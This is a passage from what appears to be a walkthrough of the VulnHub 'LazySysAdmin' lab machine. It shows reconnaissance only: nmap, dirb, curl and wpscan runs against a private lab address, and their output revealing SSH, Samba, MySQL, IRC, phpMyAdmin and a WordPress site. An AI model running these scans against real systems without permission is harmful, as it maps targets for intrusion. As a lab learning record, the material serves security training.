role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  <span class="cm-number">256</span> 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">80</span>/tcp   open  http        Apache httpd <span class="cm-number">2</span>.4.7 ((Ubuntu))</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-generator: Silex v2.2.7</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-methods: </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  Supported Methods: GET HEAD POST OPTIONS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-robots.txt: <span class="cm-number">4</span> disallowed entries </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_/old/ /test/ /TR2/ /Backnode_files/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-server-header: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-title: Backnode</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">139</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">3</span>.X <span class="cm-attribute">-</span> <span class="cm-number">4</span>.X (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">445</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">4</span>.3.11-Ubuntu (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">3306</span>/tcp open  mysql       MySQL (unauthorized)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">6667</span>/tcp open  irc         InspIRCd</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| irc-info: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   server: 
Admin.local</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   users: <span class="cm-number">1</span>.0</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   servers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   chans: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lusers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lservers: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> ident: nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> host: <span class="cm-number">192</span>.168.2.107</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  error: Closing link: (nmap@192.168.2.107) [Client exited]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">MAC Address: <span class="cm-number">08</span>:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Device type: general purpose</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Running: Linux <span class="cm-number">3</span>.X|4.X</span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS details: Linux <span class="cm-number">3</span>.2 <span class="cm-attribute">-</span> <span class="cm-number">4</span>.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Uptime guess: <span class="cm-number">0</span>.008 days (since Wed Jan <span class="cm-number">31</span> <span class="cm-number">20</span>:44:16 <span class="cm-number">2018</span>)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Network Distance: <span class="cm-number">1</span> hop</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TCP Sequence Prediction: <span class="cm-def">Difficulty</span><span class="cm-operator">=</span><span class="cm-number">261</span> (Good luck!)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">IP ID Sequence Generation: All zeros</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Host script results:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> 
(unknown)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Names:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<00>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<03>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<20>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   WORKGROUP<00>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  WORKGROUP<1e>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-os-discovery: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   OS: Windows <span class="cm-number">6</span>.1 (Samba <span class="cm-number">4</span>.3.11-Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Computer name: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   NetBIOS computer name: LAZYSYSADMIN\x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Domain name: \x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   FQDN: 
lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  System time: <span class="cm-number">2018</span><span class="cm-attribute">-01-31T22</span>:55:23<span class="cm-operator">+</span><span class="cm-number">10</span>:00</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-security-mode: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   account_used: guest</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   authentication_level: user</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   challenge_response: supported</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  message_signing: disabled (dangerous, but default)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_smbv2-enabled: Server supports SMBv2 protocol</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TRACEROUTE</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HOP RTT     ADDRESS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">1</span>   <span class="cm-number">0</span>.50 ms LazySysAdmin.lan (192.168.0.100)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span 
cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NSE: Script Post-scanning.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Read data files from: /usr/bin/../share/nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS and Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ .</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Nmap <span class="cm-keyword">done</span>: <span class="cm-number">1</span> IP address (1 host up) scanned <span class="cm-keyword">in</span> <span class="cm-number">31</span>.19 seconds</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           Raw packets sent: <span class="cm-number">11045</span> (487.680KB) | Rcvd: <span class="cm-number">11034</span> (442.816KB)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 2032px;"></div><div class="CodeMirror-gutters" style="display: none; height: 2062px;"></div></div></div></pre><p>Comparing the two scans, masscan finds open ports much faster than nmap, but to learn which service and version is actually listening on each port you still need nmap. The scan results show that the target has ports 22 (SSH), 80 (HTTP), 139 and 445 (Samba), 3306 (MySQL) and 6667 (IRC) open.</p><p>Start with the web service and use dirb to brute-force the directories present on the target (how to install dirb is given at the end of the article).</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div 
class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 ./dirb http://192.168.0.100 wordlists/common.txt <span class="cm-attribute">-o</span> /home/evilk0/Desktop/result.txt</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Usage: ./dirb TARGET_URL WORDLIST  <span class="cm-attribute">-o</span> OUTPUT_FILE</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>While the scanner runs, probe for exploitable points by hand. Browsing the target's web site turns up nothing of interest. Checking for robots.txt reveals four disallowed directories, and directory listing (Apache autoindex) is enabled on them, but nothing usable was found inside.</p><p><a href='http://192.168.0.100/robots.txt' target='_blank' class='url'>http://192.168.0.100/robots.txt</a></p><pre class="md-fences md-end-block" lang="http"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div 
class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-error">User-agent: *</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /old/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /test/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /TR2/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /Backnode_files/</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 123px;"></div><div class="CodeMirror-gutters" style="display: none; height: 153px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/1.png' alt='1' referrerPolicy='no-referrer' /></p><p>Use curl to grab the web server's banner: the Server response header shows Apache 2.4.7 running on Ubuntu.</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" 
tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 <span class="cm-builtin">curl</span> <span class="cm-attribute">-I</span> <span class="cm-number">192</span>.168.0.100</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HTTP/1.1 <span class="cm-number">200</span> OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Date: Wed, <span class="cm-number">31</span> Jan <span class="cm-number">2018</span> <span class="cm-number">13</span>:01:20 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Server: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Last-Modified: Sun, <span class="cm-number">06</span> Aug <span class="cm-number">2017</span> <span class="cm-number">05</span>:02:15 
GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">ETag: <span class="cm-string">"8ce8-5560ea23d23c0"</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Accept-Ranges: bytes</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Length: <span class="cm-number">36072</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Vary: Accept-Encoding</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Type: text/html</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>Now look at the dirb results: the target site runs WordPress, and a phpMyAdmin instance is also present.</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" 
role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  dirb222 <span class="cm-builtin">cat</span> /home/evilk0/Desktop/result.txt | <span class="cm-builtin">grep</span> <span class="cm-string">"^+"</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/index.html (CODE:200|SIZE:36072)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/info.php (CODE:200|SIZE:77257)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/robots.txt (CODE:200|SIZE:92)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/server-status (CODE:403|SIZE:293)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)</span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 560px;"></div><div class="CodeMirror-gutters" style="display: none; height: 590px;"></div></div></div></pre><p>Next, enumerate the WordPress install with wpscan. The output below shows an outdated theme, user registration enabled, an exposed XML-RPC endpoint and directory listing on the uploads and includes directories:</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; 
top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# wpscan http://192.168.0.100/wordpress</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        __          _______   _____                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        \ \        / /  __ \ / ____|                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          \ \/  \/ / |  ___/ \___ 
\ / __|/ _` | '_ \ </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           \  /\  /  | |     ____) | (__| (_| | | | |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">            \/  \/   |_|    |_____/ \___|\__,_|_| |_|</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        WordPress Security Scanner by the WPScan Team </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                       Version 2.9.3</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          Sponsored by Sucuri - https://sucuri.net</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] URL: http://192.168.0.100/wordpress/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Started: Thu Feb  1 01:37:20 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre 
class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] 
Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress theme in use: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Name: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 